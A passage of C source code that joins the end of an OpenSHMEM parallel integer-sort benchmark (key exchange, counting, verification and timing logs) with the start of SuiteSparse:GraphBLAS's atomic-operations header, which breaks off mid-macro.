// free the memory
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
free(my_local_bucketed_keys_chunk[chunk][bucket]);
}
free(local_bucket_offsets_chunk[chunk]);
free(my_local_bucketed_keys_chunk[chunk]);
}
free(my_local_bucketed_keys_chunk);
free(local_bucket_offsets_chunk);
timer_stop(&timers[TIMER_BUCKETIZE]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: local bucketed keys: ", my_rank);
for(uint64_t i = 0; i < NUM_KEYS_PER_PE; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_local_bucketed_keys[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return my_local_bucketed_keys;
}
#if defined(_SHMEM_WORKERS)
typedef struct exchange_keys_async_t {
KEY_TYPE const * restrict const my_local_bucketed_keys;
const long long int max_bucket_size;
const long long int send_offsets_start;
const long long int write_offset_into_self;
} exchange_keys_async_t;
void exchange_keys_async(void* args, int chunk) {
exchange_keys_async_t* arg = (exchange_keys_async_t*) args;
KEY_TYPE const * restrict const my_local_bucketed_keys = arg->my_local_bucketed_keys;
const long long int max_bucket_size = arg->max_bucket_size;
const long long int send_offsets_start = arg->send_offsets_start;
const long long int write_offset_into_self = arg->write_offset_into_self;
const long long int chunks = max_bucket_size / actual_num_workers;
const long long int write_offset_into_self_worker = write_offset_into_self + (chunk * chunks);
const long long int send_offsets_start_worker = send_offsets_start + (chunk * chunks);
long long int send_size = chunks;
if(chunk+1 == actual_num_workers) {
long long int leftover = max_bucket_size - (chunks * actual_num_workers);
send_size += leftover;
}
memcpy(&my_bucket_keys[write_offset_into_self_worker],&my_local_bucketed_keys[send_offsets_start_worker],
send_size*sizeof(KEY_TYPE));
}
#endif
/*
* Each PE sends the contents of its local buckets to the PE that owns that bucket.
*/
static inline KEY_TYPE * exchange_keys(int const * restrict const send_offsets,
int const * restrict const local_bucket_sizes,
KEY_TYPE const * restrict const my_local_bucketed_keys)
{
timer_start(&timers[TIMER_ATA_KEYS]);
const int my_rank = shmem_my_pe();
unsigned int total_keys_sent = 0;
for(uint64_t i = 0; i < NUM_PES; ++i){
#ifdef PERMUTE
const int target_pe = permute_array[i];
#elif INCAST
const int target_pe = i;
#else
const int target_pe = (my_rank + i) % NUM_PES;
#endif
// Local keys already written with memcpy
if(target_pe == my_rank){ continue; }
const int read_offset_from_self = send_offsets[target_pe];
const int my_send_size = local_bucket_sizes[target_pe];
const long long int write_offset_into_target = shmem_longlong_fadd(&receive_offset, (long long int)my_send_size, target_pe);
shmem_int_put(&(my_bucket_keys[write_offset_into_target]),
&(my_local_bucketed_keys[read_offset_from_self]),
my_send_size, target_pe);
#ifdef DEBUG
printf("Rank: %d Target: %d Offset into target: %lld Offset into myself: %d Send Size: %d\n",
my_rank, target_pe, write_offset_into_target, read_offset_from_self, my_send_size);
#endif
total_keys_sent += my_send_size;
}
// Keys destined for local key buffer can be written with memcpy
const long long int write_offset_into_self = shmem_longlong_fadd(&receive_offset, (long long int)local_bucket_sizes[my_rank], my_rank);
const long long int send_offsets_start = send_offsets[my_rank];
const long long int chunks = local_bucket_sizes[my_rank] / actual_num_workers;
const long long int max_bucket_size = local_bucket_sizes[my_rank];
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = actual_num_workers;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
exchange_keys_async_t args = {my_local_bucketed_keys, max_bucket_size, send_offsets_start, write_offset_into_self};
shmem_task_scope_begin();
shmem_parallel_for_nbi(exchange_keys_async, (void*)(&args), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
#if defined(_OPENMP)
int chunk;
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<actual_num_workers; chunk++) {
const long long int write_offset_into_self_worker = write_offset_into_self + (chunk * chunks);
const long long int send_offsets_start_worker = send_offsets_start + (chunk * chunks);
long long int send_size = chunks;
if(chunk+1 == actual_num_workers) {
long long int leftover = max_bucket_size - (chunks * actual_num_workers);
send_size += leftover;
}
memcpy(&my_bucket_keys[write_offset_into_self_worker],&my_local_bucketed_keys[send_offsets_start_worker],
send_size*sizeof(KEY_TYPE));
}
#endif
#ifdef BARRIER_ATA
SHMEM_BARRIER_AT_EXCHANGE;
#endif
timer_stop(&timers[TIMER_ATA_KEYS]);
timer_count(&timers[TIMER_ATA_KEYS], total_keys_sent);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
sprintf(msg,"Rank %d: Bucket Size %lld | Total Keys Sent: %u | Keys after exchange:",
my_rank, receive_offset, total_keys_sent);
for(long long int i = 0; i < receive_offset; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_bucket_keys[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return my_bucket_keys;
}
#if defined(_SHMEM_WORKERS)
typedef struct count_local_keys_async_t {
int max_chunks;
int my_min_key;
} count_local_keys_async_t;
void count_local_keys_async(void* args, int chunk) {
count_local_keys_async_t* arg = (count_local_keys_async_t*) args;
const int max_chunks = arg->max_chunks;
const int my_min_key = arg->my_min_key;
const int start_index = chunk * max_chunks;
int * restrict my_local_key_counts_1D = my_local_key_counts[chunk];
int const * restrict const my_bucket_keys_1D = &(my_bucket_keys[start_index]);
for(int i=0; i<max_chunks; i++) {
const unsigned int key_index = my_bucket_keys_1D[i] - my_min_key;
assert(my_bucket_keys_1D[i] >= my_min_key);
assert(key_index < BUCKET_WIDTH);
my_local_key_counts_1D[key_index]++;
}
}
#endif
/*
* Counts the occurence of each key in my bucket.
* Key indices into the count array are the key's value minus my bucket's
* minimum key value to allow indexing from 0.
* my_bucket_keys: All keys in my bucket unsorted [my_rank * BUCKET_WIDTH, (my_rank+1)*BUCKET_WIDTH)
*/
static inline int* count_local_keys(KEY_TYPE const * restrict const my_bucket_keys)
{
timer_start(&timers[TIMER_SORT]);
const int my_rank = shmem_my_pe();
const int my_min_key = my_rank * BUCKET_WIDTH;
const int max_chunks = (int) my_bucket_size / actual_num_workers;
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_COUNT_LOCAL_KEYS;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
count_local_keys_async_t args = {max_chunks, my_min_key};
shmem_task_scope_begin();
shmem_parallel_for_nbi(count_local_keys_async, (void*)(&args), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
#if defined(_OPENMP)
int chunk;
#pragma omp parallel for private(chunk) schedule (static,1)
#endif
for(chunk=0; chunk<CHUNKS_COUNT_LOCAL_KEYS; chunk++) {
const int start_index = chunk * max_chunks;
int * restrict my_local_key_counts_1D = my_local_key_counts[chunk];
int const * restrict const my_bucket_keys_1D = &(my_bucket_keys[start_index]);
for(int i=0; i<max_chunks; i++) {
const unsigned int key_index = my_bucket_keys_1D[i] - my_min_key;
assert(my_bucket_keys_1D[i] >= my_min_key);
assert(key_index < BUCKET_WIDTH);
my_local_key_counts_1D[key_index]++;
}
}
#endif
//sequential part here
const int leftover = my_bucket_size - (max_chunks * CHUNKS_COUNT_LOCAL_KEYS);
if(leftover) {
const int chunk = CHUNKS_COUNT_LOCAL_KEYS - 1;
for(int i=(my_bucket_size-leftover); i<my_bucket_size; i++) {
const unsigned int key_index = my_bucket_keys[i] - my_min_key;
assert(my_bucket_keys[i] >= my_min_key);
assert(key_index < BUCKET_WIDTH);
my_local_key_counts[chunk][key_index]++;
}
}
timer_stop(&timers[TIMER_SORT]);
#ifdef DEBUG
wait_my_turn();
char msg[4096];
sprintf(msg,"Rank %d: Bucket Size %lld | Local Key Counts:", my_rank, my_bucket_size);
for(int chunk=0; chunk<actual_num_workers; chunk++) {
for(uint64_t i = 0; i < BUCKET_WIDTH; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_local_key_counts[chunk][i]);
}
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return NULL;
}
typedef struct verify_results_async_t {
int max_chunks;
int my_min_key;
int my_max_key;
} verify_results_async_t;
void verify_results_async(void* args, int chunk) {
verify_results_async_t* arg = (verify_results_async_t*) args;
const int max_chunks = arg->max_chunks;
const int my_min_key = arg->my_min_key;
const int my_max_key = arg->my_max_key;
const int start_index = chunk * max_chunks;
const int max_index = start_index + max_chunks;
for(int i=start_index; i<max_index; i++) {
const int key = my_bucket_keys[i];
if((key < my_min_key) || (key > my_max_key)){
printf("Rank %d Failed Verification!\n",shmem_my_pe());
printf("Key: %d is outside of bounds [%d, %d]\n", key, my_min_key, my_max_key);
}
}
}
/*
* Verifies the correctness of the sort.
* Ensures all keys are within a PE's bucket boundaries.
* Ensures the final number of keys is equal to the initial.
*/
static int verify_results(KEY_TYPE const * restrict const my_local_keys)
{
shmem_barrier_all();
int error = 0;
const int my_rank = shmem_my_pe();
const int my_min_key = my_rank * BUCKET_WIDTH;
const int my_max_key = (my_rank+1) * BUCKET_WIDTH - 1;
const int max_chunks = (int) my_bucket_size / actual_num_workers;
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = actual_num_workers;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
verify_results_async_t args = {max_chunks, my_min_key, my_max_key};
shmem_task_scope_begin();
shmem_parallel_for_nbi(verify_results_async, (void*)(&args), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
#if defined(_OPENMP)
int chunk;
#pragma omp parallel for private(chunk) schedule (static,1)
#endif
// Verify all keys are within bucket boundaries
for(chunk=0; chunk<actual_num_workers; chunk++) {
const int start_index = chunk * max_chunks;
const int max_index = start_index + max_chunks;
for(int i=start_index; i<max_index; i++) {
const int key = my_bucket_keys[i];
if((key < my_min_key) || (key > my_max_key)){
printf("Rank %d Failed Verification!\n",shmem_my_pe());
printf("Key: %d is outside of bounds [%d, %d]\n", key, my_min_key, my_max_key);
}
}
}
#endif
//sequential part here
const int leftover = my_bucket_size - (max_chunks * actual_num_workers);
if(leftover) {
for(int i=(my_bucket_size-leftover); i<my_bucket_size; i++) {
const int key = my_local_keys[i];
if((key < my_min_key) || (key > my_max_key)){
printf("Rank %d Failed Verification!\n",my_rank);
printf("Key: %d is outside of bounds [%d, %d]\n", key, my_min_key, my_max_key);
error = 1;
}
}
}
// Verify the sum of the key population equals the expected bucket size
long long int bucket_size_test = 0;
for(int chunk=0; chunk<CHUNKS_COUNT_LOCAL_KEYS; chunk++) {
for(uint64_t i = 0; i < BUCKET_WIDTH; ++i){
bucket_size_test += my_local_key_counts[chunk][i];
}
}
if(bucket_size_test != my_bucket_size){
printf("Rank %d Failed Verification!\n",my_rank);
printf("Actual Bucket Size: %lld Should be %lld\n", bucket_size_test, my_bucket_size);
error = 1;
}
// Verify the final number of keys equals the initial number of keys
static long long int total_num_keys = 0;
shmem_longlong_sum_to_all(&total_num_keys, &my_bucket_size, 1, 0, 0, NUM_PES, llWrk, pSync);
shmem_barrier_all();
if(total_num_keys != (long long int)(NUM_KEYS_PER_PE * NUM_PES)){
if(my_rank == ROOT_PE){
printf("Verification Failed!\n");
printf("Actual total number of keys: %lld Expected %" PRIu64 "\n", total_num_keys, NUM_KEYS_PER_PE * NUM_PES );
error = 1;
}
}
return error;
}
/*
* Gathers all the timing information from each PE and prints
* it to a file. All information from a PE is printed as a row in a tab seperated file
*/
static void log_times(char * log_file)
{
FILE * fp = NULL;
for(uint64_t i = 0; i < TIMER_NTIMERS; ++i){
timers[i].all_times = gather_rank_times(&timers[i]);
timers[i].all_counts = gather_rank_counts(&timers[i]);
}
if(shmem_my_pe() == ROOT_PE)
{
int print_names = 0;
if(file_exists(log_file) != 1){
print_names = 1;
}
if((fp = fopen(log_file, "a+b"))==NULL){
perror("Error opening log file:");
exit(1);
}
if(print_names == 1){
print_run_info(fp);
print_timer_names(fp);
}
print_timer_values(fp);
report_summary_stats();
fclose(fp);
}
}
/*
* Computes the average total time and average all2all time and prints it to the command line
*/
static void report_summary_stats(void)
{
if(timers[TIMER_TOTAL].seconds_iter > 0) {
const uint32_t num_records = NUM_PES * timers[TIMER_TOTAL].seconds_iter;
double temp = 0.0;
for(uint64_t i = 0; i < num_records; ++i){
temp += timers[TIMER_TOTAL].all_times[i];
}
#ifdef EXTRA_STATS
avg_time = temp/num_records;
#endif
printf("Average total time (per PE): %f seconds\n", temp/num_records);
}
if(timers[TIMER_ATA_KEYS].seconds_iter >0) {
const uint32_t num_records = NUM_PES * timers[TIMER_ATA_KEYS].seconds_iter;
double temp = 0.0;
for(uint64_t i = 0; i < num_records; ++i){
temp += timers[TIMER_ATA_KEYS].all_times[i];
}
#ifdef EXTRA_STATS
avg_time_all2all = temp/num_records;
#endif
printf("Average all2all time (per PE): %f seconds\n", temp/num_records);
}
}
/*
* Prints all the labels for each timer as a row to the file specified by 'fp'
*/
static void print_timer_names(FILE * fp)
{
for(uint64_t i = 0; i < TIMER_NTIMERS; ++i){
if(timers[i].seconds_iter > 0){
fprintf(fp, "%s (sec)\t", timer_names[i]);
}
if(timers[i].count_iter > 0){
fprintf(fp, "%s_COUNTS\t", timer_names[i]);
}
}
fprintf(fp,"\n");
}
/*
* Prints all the relevant runtime parameters as a row to the file specified by 'fp'
*/
static void print_run_info(FILE * fp)
{
fprintf(fp,"SHMEM\t");
fprintf(fp,"NUM_PES %" PRIu64 "\t", NUM_PES);
fprintf(fp,"Max_Key %" PRIu64 "\t", MAX_KEY_VAL);
fprintf(fp,"Num_Iters %u\t", NUM_ITERATIONS);
switch(SCALING_OPTION){
case STRONG: {
fprintf(fp,"Strong Scaling: %" PRIu64 " total keys\t", NUM_KEYS_PER_PE * NUM_PES);
break;
}
case WEAK: {
fprintf(fp,"Weak Scaling: %" PRIu64 " keys per PE\t", NUM_KEYS_PER_PE);
break;
}
case WEAK_ISOBUCKET: {
fprintf(fp,"Weak Scaling Constant Bucket Width: %" PRIu64 "u keys per PE \t", NUM_KEYS_PER_PE);
fprintf(fp,"Constant Bucket Width: %" PRIu64 "\t", BUCKET_WIDTH);
break;
}
default:
{
fprintf(fp,"Invalid Scaling Option!\t");
break;
}
}
#ifdef PERMUTE
fprintf(fp,"Randomized All2All\t");
#elif INCAST
fprintf(fp,"Incast All2All\t");
#else
fprintf(fp,"Round Robin All2All\t");
#endif
fprintf(fp,"\n");
}
/*
* Prints all of the timining information for an individual PE as a row
* to the file specificed by 'fp'.
*/
static void print_timer_values(FILE * fp)
{
unsigned int num_records = NUM_PES * NUM_ITERATIONS;
for(uint64_t i = 0; i < num_records; ++i) {
for(int t = 0; t < TIMER_NTIMERS; ++t){
if(timers[t].all_times != NULL){
fprintf(fp,"%f\t", timers[t].all_times[i]);
}
if(timers[t].all_counts != NULL){
fprintf(fp,"%u\t", timers[t].all_counts[i]);
}
}
fprintf(fp,"\n");
}
}
/*
* Aggregates the per PE timing information
*/
static double * gather_rank_times(_timer_t * const timer)
{
if(timer->seconds_iter > 0) {
assert(timer->seconds_iter == timer->num_iters);
const unsigned int num_records = NUM_PES * timer->seconds_iter;
#ifdef OPENSHMEM_COMPLIANT
double * my_times = shmem_malloc(timer->seconds_iter * sizeof(double));
#else
double * my_times = shmalloc(timer->seconds_iter * sizeof(double));
#endif
memcpy(my_times, timer->seconds, timer->seconds_iter * sizeof(double));
#ifdef OPENSHMEM_COMPLIANT
double * all_times = shmem_malloc( num_records * sizeof(double));
#else
double * all_times = shmalloc( num_records * sizeof(double));
#endif
shmem_barrier_all();
shmem_fcollect64(all_times, my_times, timer->seconds_iter, 0, 0, NUM_PES, pSync);
shmem_barrier_all();
#ifdef OPENSHMEM_COMPLIANT
shmem_free(my_times);
#else
shfree(my_times);
#endif
return all_times;
}
else{
return NULL;
}
}
/*
* Aggregates the per PE timing 'count' information
*/
static unsigned int * gather_rank_counts(_timer_t * const timer)
{
if(timer->count_iter > 0){
const unsigned int num_records = NUM_PES * timer->num_iters;
#ifdef OPENSHMEM_COMPLIANT
unsigned int * my_counts = shmem_malloc(timer->num_iters * sizeof(unsigned int));
#else
unsigned int * my_counts = shmalloc(timer->num_iters * sizeof(unsigned int));
#endif
memcpy(my_counts, timer->count, timer->num_iters*sizeof(unsigned int));
#ifdef OPENSHMEM_COMPLIANT
unsigned int * all_counts = shmem_malloc( num_records * sizeof(unsigned int) );
#else
unsigned int * all_counts = shmalloc( num_records * sizeof(unsigned int) );
#endif
shmem_barrier_all();
shmem_collect32(all_counts, my_counts, timer->num_iters, 0, 0, NUM_PES, pSync);
shmem_barrier_all();
#ifdef OPENSHMEM_COMPLIANT
shmem_free(my_counts);
#else
shfree(my_counts);
#endif
return all_counts;
}
else{
return NULL;
}
}
/*
* Seeds each rank based on the worker number, rank and time
*/
static inline pcg32_random_t seed_my_chunk(int chunk)
{
const unsigned int my_rank = shmem_my_pe();
const unsigned int my_virtual_rank = GET_VIRTUAL_RANK(my_rank, chunk);
pcg32_random_t rng;
pcg32_srandom_r(&rng, (uint64_t) my_virtual_rank, (uint64_t) my_virtual_rank );
return rng;
}
/*
* Seeds each rank based on the rank number and time
*/
static inline pcg32_random_t seed_my_rank(void)
{
const unsigned int my_rank = shmem_my_pe();
pcg32_random_t rng;
pcg32_srandom_r(&rng, (uint64_t) my_rank, (uint64_t) my_rank );
return rng;
}
/*
* Initializes the work array required for SHMEM collective functions
*/
static void init_shmem_sync_array(long * restrict const pSync)
{
for(uint64_t i = 0; i < _SHMEM_REDUCE_SYNC_SIZE; ++i){
pSync[i] = _SHMEM_SYNC_VALUE;
}
shmem_barrier_all();
}
/*
* Tests whether or not a file exists.
* Returns 1 if file exists
* Returns 0 if file does not exist
*/
static int file_exists(char * filename)
{
struct stat buffer;
if(stat(filename,&buffer) == 0){
return 1;
}
else {
return 0;
}
}
#ifdef DEBUG
static void wait_my_turn()
{
shmem_barrier_all();
whose_turn = 0;
shmem_barrier_all();
const int my_rank = shmem_my_pe();
shmem_int_wait_until((int*)&whose_turn, SHMEM_CMP_EQ, my_rank);
sleep(1);
}
static void my_turn_complete()
{
const int my_rank = shmem_my_pe();
const int next_rank = my_rank+1;
if(my_rank < (NUM_PES-1)){ // Last rank updates no one
shmem_int_put((int *) &whose_turn, &next_rank, 1, next_rank);
}
shmem_barrier_all();
}
#endif
#ifdef PERMUTE
/*
* Creates a randomly ordered array of PEs used in the exchange_keys function
*/
static void create_permutation_array()
{
permute_array = (int *) malloc( NUM_PES * sizeof(int) );
for(uint64_t i = 0; i < NUM_PES; ++i){
permute_array[i] = i;
}
shuffle(permute_array, NUM_PES, sizeof(int));
}
/*
* Randomly shuffles a generic array
*/
static void shuffle(void * array, size_t n, size_t size)
{
char tmp[size];
char * arr = array;
size_t stride = size * sizeof(char);
if(n > 1){
for(size_t i = 0; i < (n - 1); ++i){
size_t rnd = (size_t) rand();
size_t j = i + rnd/(RAND_MAX/(n - i) + 1);
memcpy(tmp, arr + j*stride, size);
memcpy(arr + j*stride, arr + i*stride, size);
memcpy(arr + i*stride, tmp, size);
}
}
}
#endif
|
GB_atomics.h | //------------------------------------------------------------------------------
// GB_atomics.h: definitions for atomic operations
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// All atomic operations used by SuiteSparse:GraphBLAS appear in this file.
// These atomic operations assume either an ANSI C11 compiler that supports
// OpenMP 4.0 or later, or Microsoft Visual Studio on 64-bit Windows (which
// only supports OpenMP 2.0). SuiteSparse:GraphBLAS is not supported on 32-bit
// Windows.
#ifndef GB_ATOMICS_H
#define GB_ATOMICS_H
#include "GB.h"
#if GB_MICROSOFT
#include <intrin.h>
#endif
//------------------------------------------------------------------------------
// atomic updates
//------------------------------------------------------------------------------
// Whenever possible, the OpenMP pragma is used with a clause (as introduced in
// OpenMP 3.0), as follow:
//
// #pragma omp atomic [clause]
//
// where [clause] is read, write, update, or capture.
//
// Microsoft Visual Studio only supports OpenMP 2.0, which does not have the
// [clause]. Without the [clause], #pragma omp atomic is like
// #pragma omp atomic update, but the expression can only be one of:
//
// x binop= expression
// x++
// ++x
// x--
// --x
//
// where binop is one of these operators: + * - / & ^ | << >>
//
// OpenMP 3.0 and later support additional options for the "update" clause,
// but SuiteSparse:GraphBLAS uses only this form:
//
// x binop= expression
//
// where binop is: + * & ^ |
//
// This atomic update is used for the PLUS, TIMES, LAND, LXOR, and LOR monoids,
// when applied to the built-in types. For PLUS and TIMES, these are the 10
// types INTx, UINTx, FP32, FP64 (for x = 8, 16, 32, and 64). For the boolean
// monoids, only the BOOL type is used.
//
// As a result, the atomic updates are the same for gcc and icc (which support
// OpenMP 3.0 or later) with the "update" clause. For MS Visual Studio, the
// "update" clause is removed.
#if GB_MICROSOFT
// MS Visual Studio does not support the "update" clause
#define GB_ATOMIC_UPDATE GB_PRAGMA (omp atomic)
#else
// assume OpenMP 3.0 or later
#define GB_ATOMIC_UPDATE GB_PRAGMA (omp atomic update)
#endif
//------------------------------------------------------------------------------
// atomic reads and writes
//------------------------------------------------------------------------------
#if GB_MICROSOFT
// In Microsoft Visual Studio, simple reads and writes to properly aligned
// 64-bit values are already atomic on 64-bit Windows for any architecture
// supported by Windows (any Intel or ARM architecture). See:
// https://docs.microsoft.com/en-us/windows/win32/sync/interlocked-variable-access
// SuiteSparse:GraphBLAS is not supported on 32-bit Windows. Thus, there
// is no need for atomic reads/writes when compiling GraphBLAS on Windows
// with MS Visual Studio.
#define GB_ATOMIC_READ
#define GB_ATOMIC_WRITE
#else
#if __x86_64__
// No need for atomic read/write on x86_64. gcc already treats atomic
// read/write as plain read/write, so these definitions only affect icc.
#define GB_ATOMIC_READ
#define GB_ATOMIC_WRITE
#else
// ARM, Power8/9, and others need the explicit atomic read/write
#define GB_ATOMIC_READ GB_PRAGMA (omp atomic read)
#define GB_ATOMIC_WRITE GB_PRAGMA (omp atomic write)
#endif
#endif
//------------------------------------------------------------------------------
// atomic capture
//------------------------------------------------------------------------------
// An atomic capture loads the prior value of the target into a thread-local
// result, and then overwrites the targe with the new value. The target is a
// value that is shared between threads. The value and result arguments are
// thread-local. SuiteSparse:GraphBLAS uses three atomic captures,
// defined below, of the form:
//
// { result = target ; target = value ; } for int64_t and int8_t
// { result = target ; target |= value ; } for int64_t
//
// OpenMP 4.0 and later supports atomic captures with a "capture" clause:
//
// #pragma omp atomic capture
// { result = target ; target = value ; }
//
// or with a binary operator
//
// #pragma omp atomic capture
// { result = target ; target binop= value ; }
//
// MS Visual Studio supports only OpenMP 2.0, and does not support any
// "capture" clause. Thus, on Windows, _InterlockedExchange* and
// _InterlockedOr* functions are used instead, as described here:
//
// https://docs.microsoft.com/en-us/cpp/intrinsics/interlockedexchange-intrinsic-functions
// https://docs.microsoft.com/en-us/cpp/intrinsics/interlockedor-intrinsic-functions
//--------------------------------------------------------------------------
// atomic capture for int64_t
//--------------------------------------------------------------------------
// int64_t result, target, value ;
// do this atomically: { result = target ; target = value ; }
#if GB_MICROSOFT
#define GB_ATOMIC_CAPTURE_INT64(result, target, value) \
{ \
result = _InterlockedExchange64 \
((int64_t volatile *) (&(target)), value) ; \
}
#else
#define GB_ATOMIC_CAPTURE_INT64(result, target, value) \
{ \
GB_PRAGMA (omp atomic capture) \
{ \
result = target ; \
target = value ; \
} \
}
#endif
//--------------------------------------------------------------------------
// atomic capture for int8_t
//--------------------------------------------------------------------------
// int8_t result, target, value ;
// do this atomically: { result = target ; target = value ; }
#if GB_MICROSOFT
#define GB_ATOMIC_CAPTURE_INT8(result, target, value) \
{ \
result = _InterlockedExchange8 \
((char volatile *) &(target), value) ; \
}
#else
#define GB_ATOMIC_CAPTURE_INT8(result, target, value) \
{ \
GB_PRAGMA (omp atomic capture) \
{ \
result = target ; \
target = value ; \
} \
}
#endif
//--------------------------------------------------------------------------
// atomic capture with bitwise OR, for int64_t
//--------------------------------------------------------------------------
// int64_t result, target, value ;
// do this atomically: { result = target ; target |= value ; }
#if GB_MICROSOFT
#define GB_ATOMIC_CAPTURE_INT64_OR(result, target, value) \
{ \
result = _InterlockedOr64 \
((int64_t volatile *) (&(target)), value) ; \
}
#else
#define GB_ATOMIC_CAPTURE_INT64_OR(result, target, value) \
{ \
GB_PRAGMA (omp atomic capture) \
{ \
result = target ; \
target |= value ; \
} \
}
#endif
//------------------------------------------------------------------------------
// atomic compare-and-exchange
//------------------------------------------------------------------------------
// Atomic compare-and-exchange is used to implement the MAX, MIN and EQ
// monoids, for the fine-grain saxpy-style matrix multiplication. Ideally,
// OpenMP would be used for these atomic operation, but they are not supported.
// So compiler-specific functions are used instead.
// In gcc and icc, the atomic compare-and-exchange function
// __atomic_compare_exchange computes the following, as a single atomic
// operation, where type_t is any 8, 16, 32, or 64 bit scalar type. In
// SuiteSparse:GraphBLAS, type_t can be bool, int8_t, uint8_t, int16_t,
// uint16_t, int32_t, uint32_t, int64_t, uint64_t, float, or double.
//
// bool __atomic_compare_exchange
// (
// type_t *target, // input/output
// type_t *expected, // input/output
// type_t *desired, // input only, even though it is a pointer
// bool weak, // true, for SuiteSparse:GraphBLAS
// int success_memorder, // __ATOMIC_RELAXED for SuiteSparse:GrB
// int failure_memorder // __ATOMIC_RELAXED for SuiteSparse:GrB
// )
// {
// bool result ;
// if (*target == *expected)
// {
// *target = *desired ;
// result = true ;
// }
// else
// {
// *expected = *target ;
// result = false ;
// }
// return (result) ;
// }
//
// The generic __atomic_compare_exchange function in gcc (also supported by
// icc) computes the above for any of these 8, 16, 32, or 64-bit scalar types
// needed in SuiteSparse:GraphBLAS. SuiteSparse:GraphBLAS does not require the
// 'expected = target' assignment if the result is false. It ignores the
// value of 'expected' after the operation completes. The target, expected,
// and desired parameters are all provided as pointers:
//
// __atomic_compare_exchange also includes parameters that define the memory
// model. SuiteSparse:GraphBLAS can use the most relaxed settings for these
// parameters (weak is true, and the memorder parameters are both
// __ATOMIC_RELAXED).
//
// See https://gcc.gnu.org/onlinedocs/gcc/_005f_005fatomic-Builtins.html for
// more details.
// Microsoft Visual Studio provides similar but not identical functionality in
// the _InterlockedCompareExchange functions, but they are named differently
// for different types. Only int8_t, int16_t, int32_t, and int64_t types are
// supported. For the int64_t case, the following is performed atomically:
//
// int64_t _InterlockedCompareExchange64
// (
// int64_t volatile *target, // input/output
// int64_t desired // input only
// int64_t expected
// )
// {
// int64_t result = *target ;
// if (*target == expected)
// {
// target = desired ;
// }
// return (result) ;
// }
//
// It does not assign "expected = target" if the test is false, but
// SuiteSparse:GraphBLAS does not require this action. It does not return a
// boolean result, but instead returns the original value of (*target).
// However, this can be compared with the expected value to obtain the
// same boolean result as __atomic_compare_exchange.
//
// Type punning is used to extend these signed integer types to unsigned
// integers of the same number of bytes, and to float and double.
#if GB_MICROSOFT
//--------------------------------------------------------------------------
// GB_PUN: type punning
//--------------------------------------------------------------------------
// With type punning, a value is treated as a different type, but with no
// typecasting. The address of the variable is first typecasted to a (type
// *) pointer, and then the pointer is dereferenced. Type punning is only
// needed to extend the atomic compare/exchange functions for Microsoft
// Visual Studio.
#define GB_PUN(type,value) (*((type *) (&(value))))
//--------------------------------------------------------------------------
// compare/exchange for MS Visual Studio
//--------------------------------------------------------------------------
// bool, int8_t, and uint8_t
#define GB_ATOMIC_COMPARE_EXCHANGE_8(target, expected, desired) \
( \
GB_PUN (int8_t, expected) == \
_InterlockedCompareExchange8 ((int8_t volatile *) (target), \
GB_PUN (int8_t, desired), GB_PUN (int8_t, expected)) \
)
// int16_t and uint16_t
#define GB_ATOMIC_COMPARE_EXCHANGE_16(target, expected, desired) \
( \
GB_PUN (int16_t, expected) == \
_InterlockedCompareExchange16 ((int16_t volatile *) (target), \
GB_PUN (int16_t, desired), GB_PUN (int16_t, expected)) \
)
// float, int32_t, and uint32_t
#define GB_ATOMIC_COMPARE_EXCHANGE_32(target, expected, desired) \
( \
GB_PUN (int32_t, expected) == \
_InterlockedCompareExchange ((int32_t volatile *) (target), \
GB_PUN (int32_t, desired), GB_PUN (int32_t, expected)) \
)
// double, int64_t, and uint64_t
#define GB_ATOMIC_COMPARE_EXCHANGE_64(target, expected, desired) \
( \
GB_PUN (int64_t, expected) == \
_InterlockedCompareExchange64 ((int64_t volatile *) (target), \
GB_PUN (int64_t, desired), GB_PUN (int64_t, expected)) \
)
#else
//--------------------------------------------------------------------------
// compare/exchange for gcc, icc, and clang
//--------------------------------------------------------------------------
// the compare/exchange function is generic for any type
#define GB_ATOMIC_COMPARE_EXCHANGE_X(target, expected, desired) \
__atomic_compare_exchange (target, &expected, &desired, \
true, __ATOMIC_RELAXED, __ATOMIC_RELAXED) \
// bool, int8_t, and uint8_t
#define GB_ATOMIC_COMPARE_EXCHANGE_8(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X(target, expected, desired)
// int16_t and uint16_t
#define GB_ATOMIC_COMPARE_EXCHANGE_16(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X (target, expected, desired)
// float, int32_t, and uint32_t
#define GB_ATOMIC_COMPARE_EXCHANGE_32(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X (target, expected, desired)
// double, int64_t, and uint64_t
#define GB_ATOMIC_COMPARE_EXCHANGE_64(target, expected, desired) \
